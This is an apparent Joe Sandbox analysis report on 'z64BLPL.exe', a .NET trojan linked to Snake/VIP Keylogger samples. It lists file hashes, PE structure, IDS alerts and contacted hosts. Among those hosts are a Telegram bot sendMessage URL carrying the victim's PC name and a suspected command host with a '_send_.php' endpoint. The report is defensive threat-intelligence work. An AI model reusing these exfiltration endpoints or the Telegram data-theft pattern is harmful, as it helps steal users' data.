https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a	z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	z64BLPL.exe	true	URL Reputation: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	z64BLPL.exe	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mail.electradubai.com	z64BLPL.exe, 00000000.00000002.4120925537.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	z64BLPL.exe	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	z64BLPL.exe	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
192.250.231.25	mail.electradubai.com	United States	36454	CNSV-LLCUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519553
Start date and time:	2024-09-26 17:09:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	z64BLPL.exe
Detection:	MAL
Classification:	mal100.troj.spyw.winEXE@1/0@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 75 Number of non-executed functions: 37
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: z64BLPL.exe

Simulations

Behavior and APIs

Time	Type	Description
11:09:59	API Interceptor	11497768x Sleep call for process: z64BLPL.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Ky4pZ0WB/download
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	http://www.tiktok758.com/	Get hash	malicious	Unknown	Browse	www.tiktok758.com/img/logo.4c830710.svg
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2wnz/
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/13rSMZZi/download
193.122.6.168	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FAKTURA_.EXE.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	checkip.dyndns.org/
	rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rBSH200924_pdf.cmd.exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/
	rcontractorder.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
api.telegram.org	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Win32.CrypterX-gen.6879.11943.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.6.168
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
TELEGRAMRU	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1a	Get hash	malicious	Unknown	Browse	104.26.8.129
	Final_Contract_Copy-532392974.pdf	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://lsaustralasia-my.sharepoint.com/:f:/g/personal/janine_lsaust_com_au/EggCi2jFo0JOu2itfCjIwu4B_JvtVZTi0sK58OhnVfOx1Q?e=1IcsEe	Get hash	malicious	Unknown	Browse	104.18.86.42
	Spam .msg	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Final_Contract_Copy-532392974.pdf	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylink	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	1.1.1.1
	https://dyjh.invdigitaldocs.com/Yp45g	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://fub.direct/1/-vWjF5-zkXOO9FYu1PvcR9oL_v9wxWQugIahU1Sumip1aJEFjv7arGFxl8RwHXdse9Zqfr-Geb0wD7JwZstmrogxBkr93dacZn8BO2DpKYk/https/goncalvesalexandre.com/g63f/5876983556/Marlpar/#?email=amhAbWFybHBhci5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://uwazidigital.co.ke/mde/anti.php/	Get hash	malicious	HTMLPhisher	Browse	104.18.86.42
	https://uwazidigital.co.ke/mde/anti.php/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
CNSV-LLCUS	F#U0130YAT TEKL#U0130F#U0130-2400.exe	Get hash	malicious	AgentTesla	Browse	192.250.227.28
	https://sesworld.com.au:443/it/mount/	Get hash	malicious	Unknown	Browse	192.250.235.25
	https://hmchive.com/?hcv=bGFldGl0aWEucGF0cnktYmFsYXRAc3VlZHp1Y2tlcmdyb3VwLmNvbS0tLS1DYXJsb3MgR2FpdMOhbg==	Get hash	malicious	Unknown	Browse	192.250.227.21
	z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe	Get hash	malicious	FormBook	Browse	192.250.231.28
	https://sgsconsulting.com/	Get hash	malicious	Unknown	Browse	192.250.227.23
	https://sgsconsulting.com/	Get hash	malicious	Unknown	Browse	192.250.227.23
	http://linkplea.se/doar	Get hash	malicious	Unknown	Browse	192.250.229.80
	rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.250.234.170
	https://kanomama.com/KFKFLDRFKLEK?///RG9tYWluXFVzZXJuYW1lQGRvbWFpbi5jb20=	Get hash	malicious	HTMLPhisher	Browse	192.250.229.40
	Novi upit #876567-AWB.exe	Get hash	malicious	FormBook	Browse	192.250.227.27

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	purchase order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	REQUEST FOR QUOTATION.js	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	188.114.97.3
	VbcXXnmIwPPhh.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Ref_336210627.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	nBank_Report.pif.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	https://docs.google.com/drawings/d/1wD-DOvNLKuM60BZj5TLzFjKI87o3EE-OVAmvFF0fxPk/preview?usp=sharing	Get hash	malicious	Unknown	Browse	188.114.97.3
	ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1a	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://lsaustralasia-my.sharepoint.com/:f:/g/personal/janine_lsaust_com_au/EggCi2jFo0JOu2itfCjIwu4B_JvtVZTi0sK58OhnVfOx1Q?e=1IcsEe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	149.154.167.220
	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3B	Get hash	malicious	Unknown	Browse	149.154.167.220
	REQUEST FOR QUOTATION.js	Get hash	malicious	PXRECVOWEIWOEI Stealer, PureLog Stealer	Browse	149.154.167.220
	Payment-Remittance_pdfrexel.se959575798273.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.631943584952463
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	z64BLPL.exe
File size:	276'992 bytes
MD5:	9c7cf85d2fa1d9c0b6c591b94cbf2830
SHA1:	55822a8ed3ceda0fc325d998af2e379fb05a948e
SHA256:	fe777d4ff348afb74ba7556da56b29a4ee0a66f7b044674fd1f18641573337f2
SHA512:	813817015ddeec9e3bab1e1a945cecb942f75250fc2ea0de89de28c604e69d204d2a0217d4fa6be0d09bb662fddd2a17849a3989eb5a11bdd4b087ffddffb15f
SSDEEP:	3072:8WAT5ctg+Orw0aqqb5mlXYOE6jc7dz0pHuhdzm3bfS2z/LQunsoAUYTVg4iIbbY:v6sm3bg7b
TLSH:	A84484092FD8A801D6FF8877C2B65125C6BAF42306698E3E16D1F81A3E3D541DE46F63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..$...........C... ...`....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x44432e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x442d4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0x1017	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x42334	0x42400	2c0ce32df969b8f70c1ba77c652c23c0	False	0.2141583136792453	data	5.633651046865783	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x46000	0x1017	0x1200	78b97a769c57cf460625c961b04b1a16	False	0.3543836805555556	data	4.76801789588623	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48000	0xc	0x200	3357292ff3dc4e25505da1bb6c6902f0	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x460a0	0x31c	data			0.4271356783919598
RT_MANIFEST	0x463bc	0xc5b	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.3926651912741069

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T17:09:59.130992+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	193.122.6.168	80	TCP
2024-09-26T17:10:00.568500+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	193.122.6.168	80	TCP
2024-09-26T17:10:01.211022+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49732	188.114.97.3	443	TCP
2024-09-26T17:10:22.605931+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.6.168	80	TCP
2024-09-26T17:10:31.334225+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	193.122.6.168	80	TCP
2024-09-26T17:10:35.905707+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49742	193.122.6.168	80	TCP
2024-09-26T17:10:36.584155+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49742	193.122.6.168	80	TCP
2024-09-26T17:10:38.849813+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49744	193.122.6.168	80	TCP
2024-09-26T17:10:42.177920+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49746	193.122.6.168	80	TCP
2024-09-26T17:10:43.662331+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49748	193.122.6.168	80	TCP
